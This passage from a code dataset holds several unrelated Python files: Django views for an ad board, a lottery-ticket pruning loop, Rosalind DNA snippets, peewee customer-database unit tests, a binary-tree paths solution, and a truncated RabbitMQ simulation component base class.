= 'ads'\n ordering = ['-creation_time']\n paginate_by = 30\n\n\nclass AdDetail(DetailView):\n model = Ad\n template_name = \"ad_detail.html\"\n context_object_name = 'ad'\n\n\nclass AdFiltered(LoginRequiredMixin, FilterView):\n filterset_class = AdFilter\n template_name = 'ad_filtered.html'\n context_object_name = 'ad_filtered'\n ordering = ['-creation_time']\n paginate_by = 5\n\n def get_queryset(self):\n queryset = Ad.objects.filter(user_id=self.request.user).values(\n 'user_id__email',\n 'category_id__name',\n 'header',\n 'ad',\n 'id',\n 'creation_time',\n 'reply__user_id__email',\n 'reply__reply',\n 'reply__creation_time',\n 'reply__is_approved',\n 'reply__id',\n )\n return queryset\n\n\nclass AdCreate(LoginRequiredMixin, CreateView):\n model = Ad\n fields = ['category_id', 'header', 'ad']\n template_name = 'ad_create.html'\n context_object_name = 'ad_create'\n\n def get_success_url(self):\n self.success_url = reverse('ad_list_view')\n return super().get_success_url()\n\n def form_valid(self, form):\n form.instance.user_id = self.request.user\n return super().form_valid(form)\n\n\nclass AdEdit(LoginRequiredMixin, UpdateView):\n model = Ad\n fields = ['category_id', 'header', 'ad']\n template_name = 'ad_create.html'\n context_object_name = 'ad_create'\n\n def get_success_url(self):\n self.success_url = reverse('ad_list_view')\n return super().get_success_url()\n\n\nclass AdDelete(LoginRequiredMixin, DeleteView):\n model = Ad\n template_name = 'ad_delete.html'\n context_object_name = 'ad_delete'\n\n def get_success_url(self):\n self.success_url = reverse('ad_list_view')\n return super().get_success_url()\n\n\nclass ReplyList(LoginRequiredMixin, ListView):\n template_name = 'reply_list.html'\n context_object_name = 'reply_list'\n paginate_by = 30\n\n def get_queryset(self):\n queryset = Reply.objects.\\\n filter(user_id=self.request.user).order_by('-creation_time')\n return queryset\n\n\nclass ReplyConfirmApprove(LoginRequiredMixin, DetailView):\n model = Reply\n template_name = \"reply_approve.html\"\n context_object_name = 'reply'\n\n\n@login_required\ndef approve_reply(request, pk):\n reply = Reply.objects.get(id=pk)\n if request.user.id == reply.ad_id.user_id.id:\n reply.is_approved = True\n reply.save()\n\n return redirect(reverse('ad_filtered_view'))\n\n\nclass ReplyCreate(LoginRequiredMixin, CreateView):\n model = Reply\n template_name = 'reply_create.html'\n fields = ['reply']\n context_object_name = 'reply_create'\n\n def get_success_url(self):\n self.success_url = reverse('ad_list_view')\n return super().get_success_url()\n\n def form_valid(self, form):\n form.instance.user_id = self.request.user\n form.instance.ad_id = Ad.objects.get(id=self.kwargs['ad_id'])\n return super().form_valid(form)\n\n\nclass ReplyDelete(LoginRequiredMixin, DeleteView):\n model = Reply\n template_name = 'reply_delete.html'\n context_object_name = 'reply_delete'\n\n def get_success_url(self):\n self.success_url = reverse('ad_filtered_view')\n return super().get_success_url()\n\n\nclass NewsList(ListView):\n model = News\n template_name = 'news_list.html'\n context_object_name = 'news_list'\n ordering = ['-creation_time']\n paginate_by = 20\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['in_mailing_list'] = self.request.user.groups.filter(\n name='mailing_list'\n ).exists()\n return context\n\n\nclass NewsDetail(DetailView):\n model = News\n template_name = 'news_detail.html'\n context_object_name = 'news'\n\n\nclass NewsMailingConfirm(LoginRequiredMixin, PermissionRequiredMixin,\n DetailView):\n model = News\n template_name = 'news_confirm_mailing.html'\n context_object_name = 'news'\n permission_required = ('board.create_news',)\n\n\n@permission_required('board.create_news')\ndef news_mailing_confirm(reqest, pk):\n site = 'https://{domain}'.format(\n domain=Site.objects.get_current().domain,\n )\n\n url = '{domain}{path}'.format(\n domain=site,\n path=reverse('news_detail_view', args=[pk]),\n )\n\n mailing_news = News.objects.get(id=pk)\n mailing_users = get_user_model().objects.filter(\n groups__name='mailing_list',\n )\n\n for user in mailing_users:\n user_email = user.email\n html_content = render_to_string(\n 'email/mail_mailing_news.html',\n {\n 'news': mailing_news,\n 'site': site,\n 'url': url,\n 'user': user_email,\n }\n )\n txt_content = render_to_string(\n 'email/mail_mailing_news.txt',\n {\n 'news': mailing_news,\n 'site': site,\n 'url': url,\n 'user': user_email,\n }\n )\n subject = render_to_string(\n 'email/subject_mailing_news.txt',\n {\n 'site': site,\n 'news': mailing_news,\n }\n )\n mail_to = [user_email]\n\n send_mail.delay(mail_to, subject, txt_content, html_content)\n return redirect(reverse('news_list_view'))\n\n\nclass NewsCreate(LoginRequiredMixin, PermissionRequiredMixin, CreateView):\n model = News\n fields = ['header', 'news']\n template_name = 'news_create.html'\n context_object_name = 'news_create'\n permission_required = ('board.create_news',)\n\n def get_success_url(self):\n self.success_url = reverse('news_list_view')\n return super().get_success_url()\n\n def form_valid(self, form):\n form.instance.user_id = self.request.user\n return super().form_valid(form)\n\n\nclass NewsEdit(LoginRequiredMixin, PermissionRequiredMixin, UpdateView):\n model = News\n fields = ['header', 'news']\n template_name = 'news_create.html'\n context_object_name = 'news_create'\n permission_required = ('board.change_news',)\n\n def get_success_url(self):\n self.success_url = reverse('news_list_view')\n return super().get_success_url()\n\n\nclass NewsDelete(LoginRequiredMixin, PermissionRequiredMixin, DeleteView):\n model = News\n template_name = 'news_delete.html'\n context_object_name = 'news_delete'\n permission_required = ('board.delete_news',)\n\n def get_success_url(self):\n self.success_url = reverse('news_list_view')\n return super().get_success_url()\n\n\n@login_required\ndef news_subscribe(request):\n group, created = Group.objects.get_or_create(name='mailing_list')\n group.user_set.add(request.user)\n\n return redirect(reverse('news_list_view'))\n\n\n@login_required\ndef news_unsubscribe(request):\n group, created = Group.objects.get_or_create(name='mailing_list')\n group.user_set.remove(request.user)\n\n return redirect(reverse('news_list_view'))\n","sub_path":"portal/board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"231453215","text":"# Copyright (C) 2018 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Run the lottery ticket experiment.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\n\n\ndef run_experiment(experiment, max_prune_iterations, presets=None):\n \"\"\"Run the lottery ticket experiment for the specified number of iterations.\n\n Args:\n experiment: an object implementing ExperimentBase\n max_num_prunes: The number of pruning iterations to perform.\n presets: (optional) The presets to use for the first iteration of training.\n In the form of a dictionary where each key is the name of a tensor and\n each value is a numpy array of the values to which that tensor should\n be initialized.\n \"\"\"\n # Run once normally.\n initial, final_weights, train_acc = experiment.train_once(0, presets=presets)\n\n # Create the initial masks with no weights pruned.\n masks = {}\n for k, v in initial.items():\n masks[k] = np.ones(v.shape)\n\n # Begin the training loop.\n for iteration in range(1, max_prune_iterations + 1):\n if experiment.stop_pruning(train_acc):\n break\n\n # Prune the network.\n masks = experiment.prune_masks(masks, final_weights)\n\n # Train the network again.\n _, final_weights, train_acc = experiment.train_once(iteration, presets=initial, masks=masks)\n","sub_path":"lottery_ticket/foundations/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"195371436","text":"# 1\nA, T, C, G = 0, 0, 0, 0\n# print(A)\n\n# 2\nwith open('rosalind_dna.txt','r') as open_file:\n\tline = open_file.readline()\n\n# 2a\nwith open('rosalind_iprb.txt', 'r') as infile:\n (k, m, n) = (int(value) for value in infile.readline().split())\n\n# 3\nresult = line.replace('A','t').replace('T','a').replace('G','c').replace('C','g').upper()[::-1]\n\n# 4 \npercent = round(cg*100/strlen,6)\n\n#5 \nwith open('file.txt','r') as f:\n\tstrands = [x.strip() for x in f.readlines()]\n\n#6 - parces multiline FASTA-format input into a dictionary\ntemp_key = ''\ninputdata = {}\nwith open('rosalind_gc.txt','r') as f:\n\tline = f.readline().strip()\n\twhile line:\n\t\tif line[:1]=='>':\n\t\t\ttemp_key = line[1:]\n\t\telse:\n\t\t\tif temp_key not in inputdata.keys():\n\t\t\t\tinputdata[temp_key] = ''\n\t\t\tinputdata[temp_key]+=line\n\t\tline = f.readline().strip()","sub_path":"rosalind.info/2remember.py","file_name":"2remember.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"41587424","text":"'''\nUnit tests\n'''\n\n# pylint: disable=W\n# pylint: disable=R0201\n\nimport logging\nfrom unittest import TestCase\nimport peewee\nfrom customers_model import *\nfrom basic_operations import *\n\nlogging.basicConfig(level=logging.INFO)\nLOGGER = logging.getLogger(__name__)\n\nclass TestBasicOperations(TestCase):\n '''Test all Database functions'''\n def setUp(self):\n '''Create the tables'''\n database.create_tables([Customers])\n LOGGER.info('Create table successful')\n\n def tearDown(self):\n '''Delete the tables'''\n database.drop_tables([Customers])\n LOGGER.info('Database tables dropped')\n\n def test_add_customer(self):\n '''test add a customer to the database'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n add_customer(**test_customer)\n record = Customers.get(Customers.customer_id == test_customer['customer_id'])\n LOGGER.info(\"New customer: {}\".format(record.name))\n self.assertEqual(record.customer_id, test_customer['customer_id'])\n\n def test_search_customer(self):\n '''test searching for a customer by ID'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n\n add_customer(**test_customer)\n customer_record = {'name':'Eric Grandeo', 'lastname':'Grandeo',\n 'email_address':'email@email.com',\n 'phone_number':'1-212-555-1234'}\n result = search_customer('12345')\n self.assertEqual(result, customer_record)\n\n\n def test_search_customer_fail(self):\n '''test a failed search, user does not exist'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n\n add_customer(**test_customer)\n fail_customer = {}\n result = search_customer('12346')\n self.assertEqual(result, fail_customer)\n\n def test_delete_customer(self):\n '''test deleting a customer'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n add_customer(**test_customer)\n self.assertEqual(delete_customer(test_customer['customer_id']), None)\n\n def test_delete_customer_fail(self):\n '''test deleting a customer that does not exist'''\n with self.assertRaises(ValueError):\n delete_customer('2468')\n\n def test_update_customer_credit(self):\n '''test updating a users credit limit by id'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n add_customer(**test_customer)\n update_customer_credit(test_customer['customer_id'], 100000)\n get_customer = Customers.get(Customers.customer_id == test_customer['customer_id'])\n LOGGER.info(\"New credit limit: {}\".format(get_customer.credit_limit))\n self.assertEqual(get_customer.credit_limit, 100000)\n\n\n def test_update_customer_credit_fail(self):\n '''test updating the credit limit of a user that does not exist'''\n test_customer = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n add_customer(**test_customer)\n with self.assertRaises(ValueError):\n update_customer_credit('2468', 100000)\n\n def test_list_active_customers(self):\n '''test getting the number of active customers where active == True'''\n test_customer_1 = {\n 'customer_id': '12345',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n test_customer_2 = {\n 'customer_id': '45678',\n 'name': 'Jack Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': False,\n 'credit_limit': 25000\n }\n test_customer_3 = {\n 'customer_id': '54321',\n 'name': 'Vivie Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }\n add_customer(**test_customer_1)\n add_customer(**test_customer_2)\n add_customer(**test_customer_3)\n return_active_customers()\n self.assertEqual(list_active_customers(), 2)\n\n def test_add_multiple_customers(self):\n 'test adding multiple customers'\n test_customers = [{\n 'customer_id': '54321',\n 'name': 'Eric Grandeo',\n 'lastname': 'Grandeo',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n },\n {\n 'customer_id': '98765',\n 'name': 'Jack Charles',\n 'lastname': 'Charles',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': False,\n 'credit_limit': 25000\n }\n , {\n 'customer_id': '10846',\n 'name': 'Vivie Harper',\n 'lastname': 'Harper',\n 'home_address': '123 Fake Street',\n 'phone_number': '1-212-555-1234',\n 'email_address': 'email@email.com',\n 'status': True,\n 'credit_limit': 25000\n }]\n add_multiple_customers(test_customers)\n #customer_list = return_all_customers()\n #for customer in customer_list:\n # print(customer)\n print_all_customers()\n ","sub_path":"students/eric_grandeo/lesson04/unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":7812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"559561622","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n ansList =[]\n def __init__(self):\n self.ansList = []\n def binaryTreePaths(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[str]\n \"\"\"\n self.dfs(root,\"\")\n return self.ansList\n def dfs(self,root,curPath):\n\n#by using pass by value way, we don't need to append and pop out the current path\n#the last node does not has the \"->\" sign, hence the last one is a number for sure\n#when there is more to go, either left or right, we need to add \"->\" in the end\n if root == None:\n return\n if root.left == None and root.right == None:\n self.ansList.append(curPath + str(root.val))\n if root.left != None:\n self.dfs(root.left,curPath + str(root.val) + \"->\")\n if root.right != None:\n self.dfs(root.right,curPath + str(root.val) + \"->\")\n return\n \n ","sub_path":"257.py","file_name":"257.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"332295361","text":"# -*- coding: utf-8 -*-\n# Copyright 2021 Tampere University and VTT Technical Research Centre of Finland\n# This software was developed as a part of the ProCemPlus project: https://www.senecc.fi/projects/procemplus\n# This source code is licensed under the MIT license. See LICENSE in the repository root directory.\n# Author(s): Ville Heikkilä \n# Otto Hylli \n\n\"\"\"This module contains a base simulation component that can communicate with the RabbitMQ message bus.\"\"\"\n\nimport asyncio\nimport json\nfrom typing import cast, Any, Dict, List, Optional, Union\n\nfrom tools.clients import RabbitmqClient\nfrom tools.exceptions.messages import MessageError\nfrom tools.messages import (\n BaseMessage, AbstractMessage, EpochMessage, StatusMessage, SimulationStateMessage, MessageGenerator)\nfrom tools.tools import FullLogger, EnvironmentVariable\n\nLOGGER = FullLogger(__name__)\n\n# The names of the environmental variables used by the component.\nSIMULATION_ID = \"SIMULATION_ID\"\nSIMULATION_COMPONENT_NAME = \"SIMULATION_COMPONENT_NAME\"\nSIMULATION_EPOCH_MESSAGE_TOPIC = \"SIMULATION_EPOCH_MESSAGE_TOPIC\"\nSIMULATION_STATUS_MESSAGE_TOPIC = \"SIMULATION_STATUS_MESSAGE_TOPIC\"\nSIMULATION_STATE_MESSAGE_TOPIC = \"SIMULATION_STATE_MESSAGE_TOPIC\"\nSIMULATION_ERROR_MESSAGE_TOPIC = \"SIMULATION_ERROR_MESSAGE_TOPIC\"\nSIMULATION_START_MESSAGE_FILENAME = \"SIMULATION_START_MESSAGE_FILENAME\"\n\n# To receive any other messages other than \"Epoch\" and \"SimState\" from the message bus\n# use a comma separated list in SIMULATION_OTHER_TOPICS\n# for example: \"Result,Info\" would make the simulation component listen to topics\n# \"Result\" and \"Info\" in addition to the topics \"Epoch\" and \"SimState\nSIMULATION_OTHER_TOPICS = \"SIMULATION_OTHER_TOPICS\"\n\n\nclass AbstractSimulationComponent:\n \"\"\"Class for holding the state of a abstract simulation component.\n The actual simulation components should be derived from this.\"\"\"\n SIMULATION_STATE_VALUE_RUNNING = SimulationStateMessage.SIMULATION_STATES[0] # \"running\"\n SIMULATION_STATE_VALUE_STOPPED = SimulationStateMessage.SIMULATION_STATES[-1] # \"stopped\"\n\n READY_STATUS = StatusMessage.STATUS_VALUES[0] # \"ready\"\n ERROR_STATUS = StatusMessage.STATUS_VALUES[-1] # \"error\"\n\n def __init__(self,\n simulation_id: Optional[str] = None,\n component_name: Optional[str] = None,\n epoch_message_topic: Optional[str] = None,\n simulation_state_message_topic: Optional[str] = None,\n status_message_topic: Optional[str] = None,\n error_message_topic: Optional[str] = None,\n other_topics: Optional[List[str]] = None,\n rabbitmq_host: Optional[str] = None,\n rabbitmq_port: Optional[int] = None,\n rabbitmq_login: Optional[str] = None,\n rabbitmq_password: Optional[str] = None,\n rabbitmq_ssl: Optional[bool] = None,\n rabbitmq_ssl_version: Optional[str] = None,\n rabbitmq_exchange: Optional[str] = None,\n rabbitmq_exchange_autodelete: Optional[bool] = None,\n rabbitmq_exchange_durable: Optional[bool] = None,\n **kwargs: Any):\n \"\"\"Loads the simulation is and the component name as wells as the required topic names from environmental\n variables and sets up the connection to the RabbitMQ message bus for which the connection parameters are\n fetched from environmental variables. Opens a topic listener for the simulation state and epoch messages\n as well as other specified topics after creating the connection to the message bus.\n\n If any attribute is missing or its value is None, an environmental value is used for the attribute value.\n Most attributes also have a default value that is used when even the environmental value is missing.\n\n The available attributes:\n - simulation_id (str)\n - the simulation_id for the simulation, i.e. SimulationId that is used in the messages\n - environmental variable: \"SIMULATION_ID\"\n - default value: \"2020-01-01T00:00:00.000Z\"\n - component_name (str)\n - the component name, i.e. the SourceProcessId, that the component uses in the messages\n - environmental variable: \"SIMULATION_COMPONENT_NAME\"\n - default value: \"component\"\n - epoch_message_topic (str)\n - the topic name for the Epoch messages\n - environmental variable: \"SIMULATION_EPOCH_MESSAGE_TOPIC\"\n - default value: \"Epoch\"\n - simulation_state_message_topic (str)\n - the topic name for the Simulation state messages\n - environmental variable: \"SIMULATION_STATE_MESSAGE_TOPIC\"\n - default value: \"SimState\"\n - status_message_topic (str)\n - the topic name for the Status ready messages\n - environmental variable: \"SIMULATION_STATUS_MESSAGE_TOPIC\"\n - default value: \"Status.Ready\"\n - error_message_topic (str)\n - the topic name for the Status error messages\n - environmental variable: \"SIMULATION_ERROR_MESSAGE_TOPIC\"\n - default value: \"Status.Error\"\n - other_topics (List[str])\n - a list of topic names that the component needs to listen to in addition to the epoch and simulation state\n - environmental variable: \"SIMULATION_OTHER_TOPICS\"\n - in the environmental variable the list is given as a comma seprated string, e.g. \"Result,Info\"\n - default value: []\n - rabbitmq_host (str)\n - the host name for the RabbitMQ server\n - environmental variable: \"RABBITMQ_HOST\"\n - default value: \"localhost\"\n - rabbitmq_port (int)\n - the port number for the RabbitMQ server\n - environmental variable: \"RABBITMQ_PORT\"\n - default value: 5672\n - rabbitmq_login (str)\n - the username for access to the RabbitMQ server\n - environmental variable: \"RABBITMQ_LOGIN\"\n - default value: \"\"\n - rabbitmq_password (str)\n - the password for access to the RabbitMQ server\n - environmental variable: \"RABBITMQ_PASSWORD\"\n - default value: \"\"\n - rabbitmq_ssl (bool)\n - whether to use SSL connection to the RabbitMQ server\n - environmental variable: \"RABBITMQ_SSL\"\n - default value: False\n - rabbitmq_ssl_version (str)\n - the SSL version parameter for the SSL connection (ignored if rabbitmq_ssl is False)\n - environmental variable: \"RABBITMQ_SSL_VERSION\"\n - default value: \"PROTOCOL_TLS\"\n - rabbitmq_exchange (str)\n - the name for the exchange used by the RabbitMQ client\n - environmental variable: \"RABBITMQ_EXCHANGE\"\n - default value: \"\"\n - rabbitmq_exchange_autodelete (bool)\n - whether to automatically delete the exchange after use\n - environmental variable: \"RABBITMQ_EXCHANGE_AUTODELETE\"\n - default value: False\n - rabbitmq_exchange_durable (bool)\n - whether to setup the exchange to survive message bus restarts\n - environmental variable: \"RABBITMQ_EXCHANGE_DURABLE\"\n - default value: False\n - **kwargs\n - all other arguments are ignored\n \"\"\"\n # pylint: disable=unused-argument\n\n # Start the connection to the RabbitMQ client using the given connection parameters and\n # the environmental values for those parameters that were not given.\n self._rabbitmq_parameters = AbstractSimulationComponent.__get_rabbitmq_parameters(\n host=rabbitmq_host,\n port=rabbitmq_port,\n login=rabbitmq_login,\n password=rabbitmq_password,\n ssl=rabbitmq_ssl,\n ssl_version=rabbitmq_ssl_version,\n exchange=rabbitmq_exchange,\n exchange_autodelete=rabbitmq_exchange_autodelete,\n exchange_durable=rabbitmq_exchange_durable\n )\n self._rabbitmq_client = RabbitmqClient(**self._rabbitmq_parameters)\n\n # set the component variables for which the values can also be received from the environmental variables\n self.__set_component_variables(\n simulation_id=simulation_id,\n component_name=component_name,\n epoch_message_topic=epoch_message_topic,\n simulation_state_message_topic=simulation_state_message_topic,\n status_message_topic=status_message_topic,\n error_message_topic=error_message_topic,\n other_topics=other_topics\n )\n\n self.__start_message = self.__load_start_message()\n\n self._is_stopped = True\n self.initialization_error = None\n # component goes to error state after it has sent an error message\n # in an error state the component only reacts to simulation state message \"stopped\" by stopping and\n # to epoch message and simulation state message \"running\" by sending an error message.\n # Note: for errors during initialization, the self.initialization_error variable should be used\n self._in_error_state = False\n self._error_description = \"\"\n\n self._simulation_state = AbstractSimulationComponent.SIMULATION_STATE_VALUE_STOPPED\n self._latest_epoch = 0\n self._completed_epoch = 0\n self._triggering_message_ids = [\"\"]\n self._latest_status_message_id = None\n self._latest_epoch_message = None\n\n self._message_generator = MessageGenerator(self._simulation_id, self._component_name)\n # include the message id generator separately to be compatible with older code created before\n # the message generator class was implemented\n self._message_id_generator = self._message_generator.message_id_generator\n\n # lock that is set while the component is handling a message\n self._lock = asyncio.Lock()\n\n @property\n def simulation_id(self) -> str:\n \"\"\"The simulation ID for the simulation.\"\"\"\n return self._simulation_id\n\n @property\n def component_name(self) -> str:\n \"\"\"The component name in the simulation.\"\"\"\n return self._component_name\n\n @property\n def is_stopped(self) -> bool:\n \"\"\"Returns True, if the component is stopped.\"\"\"\n return self._is_stopped\n\n @property\n def is_client_closed(self) -> bool:\n \"\"\"Returns True if the RabbitMQ client has been stopped.\"\"\"\n return self._rabbitmq_client is None or self._rabbitmq_client.is_closed\n\n @property\n def initialization_error(self) -> Union[str, None]:\n \"\"\"If the component has encountered an error during initialization contains an errorr message.\n If there was no error will be None.\"\"\"\n return self._initialization_error\n\n @initialization_error.setter\n def initialization_error(self, initialization_error: Union[str, None]):\n \"\"\"Set the initialization error message.\"\"\"\n self._initialization_error = initialization_error\n\n @property\n def start_message(self) -> Optional[Dict[str, Any]]:\n \"\"\"The JSON formatted Start message as Python dictionary.\n The Start message is set to None if the Start message is not available.\"\"\"\n return self.__start_message\n\n async def start(self) -> None:\n \"\"\"Starts the component.\"\"\"\n if self.initialization_error is not None or self._in_error_state:\n if self.initialization_error is not None:\n LOGGER.error(\"Component has an initialization error: {}\".format(self.initialization_error))\n else:\n LOGGER.error(\"Component because it is in an error state: {}\".format(self._error_description))\n LOGGER.warning(\"The component will be started to allow the others to know about the error.\")\n\n if self.is_client_closed:\n self._rabbitmq_client = RabbitmqClient(**self._rabbitmq_parameters)\n\n LOGGER.info(\"Starting the component: '{}'\".format(self.component_name))\n topics_to_listen = self._other_topics + [\n self._simulation_state_topic,\n self._epoch_topic\n ]\n self._rabbitmq_client.add_listener(topics_to_listen, self.general_message_handler_base)\n self._is_stopped = False\n\n async def stop(self) -> None:\n \"\"\"Stops the component.\"\"\"\n LOGGER.info(\"Stopping the component: '{}'\".format(self.component_name))\n self._simulation_state = AbstractSimulationComponent.SIMULATION_STATE_VALUE_STOPPED\n await self._rabbitmq_client.close()\n self._is_stopped = True\n\n def get_simulation_state(self) -> str:\n \"\"\"Returns the simulation state attribute.\"\"\"\n return self._simulation_state\n\n async def set_simulation_state(self, new_simulation_state: str) -> None:\n \"\"\"Sets the simulation state. If the new simulation state is \"running\" and the current epoch is 0,\n sends a status message to the message bus. If initialization_error is None sends a ready status message.\n If it contains an error message sends an error status.\n If the new simulation state is \"stopped\", stops the dummy component.\"\"\"\n if new_simulation_state in SimulationStateMessage.SIMULATION_STATES:\n self._simulation_state = new_simulation_state\n\n if new_simulation_state == AbstractSimulationComponent.SIMULATION_STATE_VALUE_RUNNING:\n if self._latest_epoch == 0:\n if self.initialization_error is None:\n if not self._in_error_state:\n # normal situation\n await self.send_status_message()\n else:\n # component is in an error state\n await self.send_error_message(self._error_description)\n else:\n # the component could not be initialized properly\n await self.send_error_message(self.initialization_error)\n\n elif new_simulation_state == AbstractSimulationComponent.SIMULATION_STATE_VALUE_STOPPED:\n await self.stop()\n\n def clear_epoch_variables(self) -> None:\n \"\"\"Clears all the variables that are used to store information about the received input within the\n current epoch. This method is called automatically after receiving an epoch message for a new epoch.\n\n NOTE: this method should be overwritten in any child class that uses epoch specific variables\n \"\"\"\n\n async def start_epoch(self) -> bool:\n \"\"\"Starts a new epoch for the component.\n Returns True if the epoch calculations were completed for the current epoch.\n \"\"\"\n if self._simulation_state == AbstractSimulationComponent.SIMULATION_STATE_VALUE_STOPPED:\n LOGGER.warning(\"Simulation is stopped, cannot start epoch calculations\")\n return False\n\n if self._latest_epoch_message is None:\n LOGGER.warning(\"No epoch message received, cannot start epoch calculations.\")\n return False\n\n if self._simulation_state != AbstractSimulationComponent.SIMULATION_STATE_VALUE_RUNNING:\n LOGGER.warning(\"Simulation in an unknown state: '{}', cannot start epoch calculations.\".format(\n self._simulation_state))\n return False\n\n self._latest_epoch = self._latest_epoch_message.epoch_number\n\n if self._in_error_state:\n # Component is in an error state and instead of starting a new epoch will just send an error message.\n LOGGER.error(\"Component is in an error state: {}\".format(self._error_description))\n await self.send_error_message(self._error_description)\n return True\n\n if self._completed_epoch == self._latest_epoch:\n LOGGER.warning(\"The epoch {} has already been processed.\".format(self._completed_epoch))\n LOGGER.debug(\"Resending status message for epoch {}\".format(self._latest_epoch))\n await self.send_status_message()\n return True\n\n if await self.ready_for_new_epoch():\n if await self.process_epoch():\n # The current epoch was successfully processed.\n self._completed_epoch = self._latest_epoch\n await self.send_status_message()\n LOGGER.info(\"Finished processing epoch {}\".format(self._completed_epoch))\n return True\n\n # Some information required for the epoch is still missing.\n return False\n\n async def process_epoch(self) -> bool:\n \"\"\"Process the epoch and do all the required calculations.\n Assumes that all the required information for processing the epoch is available.\n\n Returns False, if processing the current epoch was not yet possible.\n Otherwise, returns True, which indicates that the epoch processing was fully completed.\n This also indicated that the component is ready to send a Status Ready message to the Simulation Manager.\n\n NOTE: this method should be overwritten in any child class.\n \"\"\"\n # Any calculations done within the current epoch would be included here.\n # Also sending of any result messages (other than Status message) would be included here.\n return True\n\n async def ready_for_new_epoch(self) -> bool:\n \"\"\"Returns True, if all the messages required to start the processing for the current epoch are available.\n \"\"\"\n if (self._simulation_state == AbstractSimulationComponent.SIMULATION_STATE_VALUE_RUNNING and\n not self.is_stopped and\n self._completed_epoch < self._latest_epoch):\n return await self.all_messages_received_for_epoch()\n\n # Some precondition for the epoch processing were not fulfilled.\n return False\n\n async def all_messages_received_for_epoch(self) -> bool:\n \"\"\"Returns True, if all the messages required to start calculations for the current epoch have been received.\n Checks only that all the required information is available.\n Does not check any other conditions like the simulation state.\n\n NOTE: this method should be overwritten in any child class that needs more information\n than just the Epoch message.\n \"\"\"\n # The AbstractSimulationComponent needs no other information other than Epoch message for processing.\n return True\n\n async def general_message_handler_base(self, message_object: Union[BaseMessage, Any],\n message_routing_key: str) -> None:\n \"\"\"Forwards the message handling to the appropriate function depending on the message type.\"\"\"\n # only allow handling one message at a time\n async with self._lock:\n if isinstance(message_object, SimulationStateMessage):\n await self.simulation_state_message_handler(message_object, message_routing_key)\n\n elif isinstance(message_object, EpochMessage):\n await self.epoch_message_handler(message_object, message_routing_key)\n\n elif self._in_error_state:\n # component is in an error state and will not react to any other messages\n return\n\n else:\n # Handling of any other message types would be added to a separate function.\n await self.general_message_handler(message_object, message_routing_key)\n\n async def general_message_handler(self, message_object: Union[BaseMessage, Any],\n message_routing_key: str) -> None:\n \"\"\"Forwards the message handling to the appropriate function depending on the message type.\n Assumes that the messages are not of type SimulationStateMessage or EpochMessage.\n\n NOTE: this method should be overwritten in any child class that listens to other messages.\n \"\"\"\n if isinstance(message_object, AbstractMessage):\n LOGGER.debug(\"Received {} message from topic {}\".format(\n message_object.message_type, message_routing_key))\n else:\n LOGGER.debug(\"Received 